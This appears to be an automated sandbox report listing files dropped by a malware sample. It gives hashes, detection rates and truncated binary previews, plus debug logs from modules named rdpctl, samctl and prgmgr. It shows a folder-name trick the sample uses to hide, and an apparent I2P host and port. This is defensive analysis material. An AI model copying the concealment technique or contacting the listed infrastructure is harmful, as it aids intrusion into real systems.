                Preview:M....vt'%3.....P%/.tB..,o:1.z3.Y..6g.fx...D.]s.G%.~r..0./.z.....t...p.H.8.....g"n.x..../P....i.N.....z.^"Y.;.En.:..z...}j...-...,.b.6.t..0.M%.A1.i..w.....{..n...;_7....I3<..O.....f2e.L<..s..+c..\..*Y.Y."._.M.]5..~Bf.%-.K..C....$.7...(..,......tr...h/.!9...p....x...0..~.K2ry...........G...7......c.q.c8*..7c..-D.5t.5.....$..!..=.DW.b\t....:c..../t.69Jg.s.......s..A..."..WF_....AF4O.*.s/.S..d....s..WK.lD......\.E..C?KD.~V.p.J..|....}.f.V^..v]...I.1}.......A.}.\a<....U.$...!...W4'.E.h..y.
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):7.5749567823447554
                Encrypted:false
                SSDEEP:12:Vo2pssEgeawWhybhr6qaJruasXmcYmkQ01:VtssEgJxytUf7XQ01
                MD5:6C7EB2197A85920F1FE4FF3832F2ACDB
                SHA1:90E1F49A73E8A234465431386982648DE7F77480
                SHA-256:A6A7F1C83C390624A617DE84CE796A3E0279247638A2BCC84B7548A6F61BDC51
                SHA-512:9FBB71582487013071E0751A0B71B5AAA087ECB632FA7B0741E5377E8AFE4AA044C5C119E30DACF686B56FB11992129E87A77C08714C58BCC24EE198752EFA0D
                Malicious:false
                Preview:..U..Ia.q...c.A5.W..8.......'..oQ.....Q....y.]..rZd..<..D.g.+E-...!..D*..<.}./.:.U....G...!v....AR.cv.sj..%a.......0.....'.T=.^E...A..!.c..U.V.../.K..B.r.....&i0..<"?."........3.K...8..%.%..O..b...+....ou5.Tf...L.....u.iZ..A....4./....q....O..<...>..E...Y.......Uv...B.....|.Yu..u.[.1.u....Cz....C`.H.".[.W..+u.1.9..>?bC....#..tn.q.3.I...#p...,......u.x>...g..K.i...h.C.W...O.|$..m?.*..).gA......~...3D..YIT..u.....s^X..,....^.|.....}.).2tx....@...5.7m..kI.E.=........[LkH...-.Z".A.|.A....
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):7.637860378079807
                Encrypted:false
                SSDEEP:12:ms6hSNHVo0aA542LaUkb1B0+yDF5SFNA3A0BqvSkjn:b4SNHrl+Ukb1B0+CSFN2L0akj
                MD5:11D3C9F25634D36948B484E22BF17ED0
                SHA1:B7E5AD65689ACADC4AD771ED058BE1F14B6C8689
                SHA-256:8895DBDE36EE8F89E0D4FDE4B78F0204054DB3077D8799B1CCB93AE22D0629F1
                SHA-512:A41AC5096926AB82CEBD9C3AD754B9D7BEDF87C5D7513234B0A017E30AEEB1F7EE82922A8269C84E1F5B818966922BCB926B30CE66B2323838A561405A669779
                Malicious:false
                Preview: -PI..{Y/G.k...i.S.;.6.@..M.<a.1...].26q`Pe..}...'=8.....5V..SLwv.`.Dwk...b..I....;...j..E....H..v..Fj.S....p..5..PS..h.j...&..q.p...C.....}_s...y2V......r$..G.K..BK..............&.....[....&\.b?..X..&..>.........|.af+P..B{9..l..,.........D.N...Q...M...Q.[..`Q\i..........5Y.X..4....."+Q."..It.cX.9..k.).L`TS}...A.9..|r.V....^o....0ae.p..=c..:...p..y7..su......p......,2J.}I.9. ue..."....Q.&..j...t.Z..2..A.7.n./..jG.Bz7o....'.....Cr7+....<y..qjn.......(C<#.7W..}.....^.^OA...Q..."<.S"A
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):7.642750013751718
                Encrypted:false
                SSDEEP:12:O9gCVi/UjPwj6tHTG8b2emzV29SjfeKJLhoGaC+Am:OW/Ujo6C1kStBCGaCLm
                MD5:CC81D7BB48338F106F06CFADACE045FB
                SHA1:344591D69D681D33BA7BB08A2B38BD33466D5939
                SHA-256:5737DB89BA782CA07B801C1CAE274B3E0074E5E26E6C7D27759FD8879E0A352E
                SHA-512:264B1C9C209227EBE64D64DB8121705018D7F221E8449F8DA8563468023E308C5F126578FCACEA0AEDA5039A3C208C6A78295339F67E050665B9820EA227AA89
                Malicious:false
                Preview:?{T...Y..<q...1..t..;[#..Y. .[.7!l...0A6.?.K.......6Ef4.....R.S,^...6.O.. P(.w..TCH.%..]....5$..k...I..(*,>.B...+.....x.....'...>....B@y.'.#5....p...._......W8N...m/...^m.guL.'.z.b....U.[.....Zi.2...... K..C.\..h.....X...I.;.0..K...n....c$...F b...)..A'.4..t0..o..DN3aJ.:4..,3eg.2."t..1.u...D.?Z1.......X.a..V.!q..C.{....ra.Z..^.*..(.~n...9...w..\^.;.2..=Kj.v.$s.....,<.t....2.V.2LY..q.f...VB.g..2x....G@:....=....F...0.p.X...l...........U[..t..*.w4&.]}....2O..l..g..t].*..,42p.6o1&....[F.3
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):80
                Entropy (8bit):6.021928094887359
                Encrypted:false
                SSDEEP:3:o8ixZKCT82m5jWW9vhB4VLZ+Xyqj9lHuWQin:o8OKCwJ86vIt+XyquW5n
                MD5:A5540A0445E31EC22002F4CE8F569506
                SHA1:8C1A86F743969B8C2BF67FE851C2D601D6D9DF89
                SHA-256:9E10AC32A6060AA6EC2959934564811335AE139F14B7C577A405E92BA6FE371C
                SHA-512:125369E01BB0909772A20D7479403DAC29DBEC4F54087A4064735557D55C21CE0F7FDC511E4DCB4BEA32DA5DDBB51AB00033B02BAEB3BF307618590AC082D14F
                Malicious:false
                Preview:.c:..........r@(I.o.{..Q.Q.I.u.>O..ZF%..s...lv..p...ov^..O.X..p....ySm+.&.
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):806
                Entropy (8bit):6.586388417930768
                Encrypted:false
                SSDEEP:12:194DysssssssssMuUg3Ox61vOQ1vuqFahEh3hCaYJJ4dmlM:jDH43vLCYdYJJsWM
                MD5:2B28886F20DD3D2EF97DD5E1762EFBA4
                SHA1:651CE032741BBB05E60B3226AEA38DD969CFC124
                SHA-256:5E92566A83EA29FEFCFC94D6AF79B7D54D8DBEF8ABEAB8C04A9C935399844660
                SHA-512:DF8118BC9D92C95381618CEA6ED7A50458B19CF017A454B80A0F65A426C7259A0420D7F5493372E445E4B5484E4ED3964D6F885045A234B3E81951F980820EE5
                Malicious:false
                Preview:.6.".er...gSB.d.}....r.4...9..m..0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%.F.W..........=0v...?.B.z.....'z..........."..............NTCP2.t.host=.8.46.123.189;.i=.xlgAj3Cty~rneVNtK~UmGw==;.port=.9525;.s=,4mM6lQChHviBGIeU65pyQChJnG~nexHimVGBURZJvXU=;.v=.2;..........SSU2...caps=.BC;.host=.8.46.123.189;.i=,UNNzGMZaPwjaHkwEruy-FkU39QBbA~Oa54SlfFplwgg=;.port=.9525;.s=,ELTGucBK09kSm-yCGpBBtcppfp5BXFM1aSd1mv9cXUM=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;..=....&I_.>....V.i..S...j%f.69.z....Nj....[.......5......X.
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):455
                Entropy (8bit):5.938059893715906
                Encrypted:false
                SSDEEP:6:SS9gpDO9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9t/:194DysssssssssgK7amkQ
                MD5:9E7FFD98C33DBFBE7F101D38B948E8B5
                SHA1:056D61E44947379EC9D014333A0882076E499B7D
                SHA-256:21438B184E2DD363CF5819DC30E0AB4ED8F97BCF096B330DF6D16DA003833852
                SHA-512:FD161EA462B076989620E97807FCC4FCB302FBE920056950032B8CBB2FEC10E8BE8EB2F3CF77527763C663CECCFD75E08F3DE51CCB6DDCD32EFC4238C2ED44C0
                Malicious:false
                Preview:.6.".er...gSB.d.}....r.4...9..m..0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%.F.W..........=0v...?.B.z.....'z........U.Fm5..xz.o...d......^Jy...Y.W.R.......nMc.T24A.._uV...1 ....3
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):96
                Entropy (8bit):6.298402344426088
                Encrypted:false
                SSDEEP:3:0bWwkoZ25XzZt048o1c8WJmzBhKem:0Kwkb5jZt0481HJGnNm
                MD5:AF578151B71A9ABEFD9A3E931D2ED43E
                SHA1:4D2B3DCCCDA2A24FA6D97BC41A4AAA88474447F9
                SHA-256:C5A0E9EADB8035D3F6ABB6A261331DFA68F4BF0DA0B74A0147F408170F217DA7
                SHA-512:E5ED9DB125C9C98B5B85C7478C85394F8ABE22C52F47DC51D675C8894F4C04AE62CC220E579BD8050A6EF7D701DA6165E33ABB150A479527C09D49CBB9147A16
                Malicious:false
                Preview:....J.......A..i~.A\S5i'u..\]C...8..+.g......4._...>....-2.v.aP.s..Z?...L....E7..[...|Ze..
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):9146880
                Entropy (8bit):6.674868432808522
                Encrypted:false
                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                MD5:676064A5CC4729E609539F9C9BD9D427
                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 3%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):89088
                Entropy (8bit):6.205377670389132
                Encrypted:false
                SSDEEP:768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
                MD5:BB070CFBD23A7BC6F2A0F8F6D167D207
                SHA1:BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
                SHA-256:C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
                SHA-512:93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 70%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*.....X.................@....................................-.....`... .................................................P............`..X............................................B..(....................................................text...X...........................`..`.data...............................@....rdata...Q.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4672
                Entropy (8bit):5.3365987054488295
                Encrypted:false
                SSDEEP:96:idHwWYJ9VFlyHzHH0H20HaSHfmHu5SHSPmHSm5SHWmHOn5SHHSHBGPQmHX5SHKnh:AziTGTn0W06SeO5SPz5SJc5SnSw35Sqh
                MD5:E033FD827FB8C3462BC57CEE0B41DC7A
                SHA1:B8C7AF6A38D095AEFB1B267516F6ACEA64C8C407
                SHA-256:9CD791F92ABAB986ECFCFB5F5D32CD48580180DE27EB5AF31AE20745D01A1706
                SHA-512:909292CBE1F0CD0BF2584FAB9CF6D9B1A7A3E64E3A07E7FA5D544C212FC7B7174254638B626063130CACD4196B962DA163660DA57DCE345D8B2CC675FEA6C3CE
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3
                Process:C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
                File Type:data
                Category:dropped
                Size (bytes):456
                Entropy (8bit):3.2341395630162877
                Encrypted:false
                SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                MD5:40AB00517F4227F2C3C334F1D16B65B4
                SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                Malicious:false
                Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):105984
                Entropy (8bit):6.285421743969757
                Encrypted:false
                SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                MD5:6E01ED70D02CE47F4D27762A9E949DEE
                SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 8%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1167
                Entropy (8bit):5.489100198407122
                Encrypted:false
                SSDEEP:24:CFAGHr5lGyclY7Gfy6BgT7cRE9FLxJbJ/l0ERgSXYlHeAOp:CFdHr54yclDYcm9FLnFlfgeD
                MD5:B9918236739FB053EC9A0A8837A1A485
                SHA1:83CE86869DA779321F9FD904555E9E8F875A2308
                SHA-256:3A29AD8A232375641F28913D18AA8D5F2E132EA5FB4AE9BF05C28B5440797B69
                SHA-512:58FD589D739A6A99CB7C4C6B00E3169145BC8E606B010244B85A1C1D205DC4A47FBE7101EA6D4EF8BA54949B03A8B3DA66A1C6CE6D4A4E88F940398ECA9C0197
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11eca8a0)..[I] (tcp_connect) -> Done(sock=0x3bc,host=7
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):129536
                Entropy (8bit):6.2852879161990645
                Encrypted:false
                SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                MD5:88E6178B0CD434C8D14710355E78E691
                SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 3%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1354
                Entropy (8bit):5.489815779472015
                Encrypted:false
                SSDEEP:24:CFAGH75lGyclY7Gfy6BgT7cRE9FLxJbJ/l0dk1RDo0XLYcRAENmMeAOp:CFdH754yclDYcm9FLnFlD0cLMMeD
                MD5:20A4271E5AA146ECCAD1C6B2BCDC44A7
                SHA1:5FB785A4A7D743477C9BFA32A1CC5C9B41EAFAC5
                SHA-256:17AFA31FBE11C1DCE8275CF167502652211F2A94DB6C6DC0B8002D9DB856CE78
                SHA-512:67A7DB785D1E9B06F92025696437387CBFC446C38E36D195328ADB8AE227C7071522941033321FC580E39F644E379ABA0B5D6DFDE24A713E67D24EA264F7E850
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11be
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):4
                Entropy (8bit):2.0
                Encrypted:false
                SSDEEP:3:9:9
                MD5:006F29D8E822B9241020AEC2495EF819
                SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                Malicious:false
                Preview:wgNj
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):37376
                Entropy (8bit):5.7181012847214445
                Encrypted:false
                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):115712
                Entropy (8bit):6.25860377459178
                Encrypted:false
                SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 3%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1926
                Entropy (8bit):5.476242505034718
                Encrypted:false
                SSDEEP:48:CFdHr+54yclDYcm9FLnFlFW05ZR5+sR5HR5ikfP5OKXbeD:idHxNYJ9VFl6D
                MD5:1D1C40526D89341E8829453D3EC08688
                SHA1:392975AFF5626BB6DCEAE19C2649210778FBFE37
                SHA-256:7FE9A5DD2646E45579E355896841D36D9AD47F451F38E87238E111AC60D6225E
                SHA-512:01379557DCA82CE25B39EC38FBF2F783743012FBC9408DEDB0F3DE46454B9FB126A99EBE0A1C826B9028AA681A7B9529FFEFA2B3BDD16D56B36ED90801CA950F
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe1177e342)..[I] (tcp_connect) -
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):91136
                Entropy (8bit):6.2041507656664825
                Encrypted:false
                SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 70%
